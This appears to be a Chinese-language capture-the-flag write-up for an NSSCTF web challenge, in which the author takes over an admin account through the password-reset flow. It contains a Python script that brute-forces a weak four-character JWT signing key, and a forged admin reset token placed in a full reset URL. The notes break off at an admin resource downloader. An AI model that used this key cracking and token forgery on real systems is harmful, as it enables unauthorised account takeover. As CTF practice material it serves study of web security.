打开发现是登录
尝试admin,密码随便输,无效,没有说用户是否存在,换其他的没用
[!NOTE]
有注册用户方式,试试看
可以注册
==但是登录显示没有权限,看来要admin==
[!NOTE]
查看另一个突破口,重置密码试试,拿自己的账号
有重置链接,查资料
查了一下验证码的资料
哦,尝试扫描网站端口,找到开放的端口
使用dirsearch工具
暴力解出来,哭不太会
from authlib.jose import jwt
from authlib.jose.errors import BadSignatureError
from string import ascii_letters,digits
from itertools import product
from tqdm import tqdm
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiOTA5NzI3NzE1QHFxLmNvbSIsImVtYWlsIjoiOTA5NzI3NzE1QHFxLmNvbSIsInR5cGUiOjN9.Fxhwn5QJl74QAMVcYzLAXdT1tgies-IAWiXGoghWXBA"
# 其实这里走了捷径,可以忽略特殊符号
for i in tqdm(product(list(ascii_letters+digits),repeat=4),desc='attaching...'):
i = "".join(i)
try:
jwt.decode(
token,
key=i
)
exit(f'key: {i}')
except BadSignatureError:
continue;
解出
然后反解出admin的重置密码
推出链接来重置密码
http://node6.anna.nssctf.cn:20562/#/[email protected]&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJlbWFpbCI6IkFkbWluaXN0cmF0b3JAMTYzLmNvbSIsInR5cGUiOjMsImV4cCI6MTczMjYyNjkxOH0.ff-9dF2mQvNTyYpSF0OxZ2dR_iKzvZOugtaIYH7nFQI
最后进入后台,有个资源下载器,base64的反解得到printf("hello world"),好像没啥用
[!WARNING]
以下内容不太会
Comments NOTHING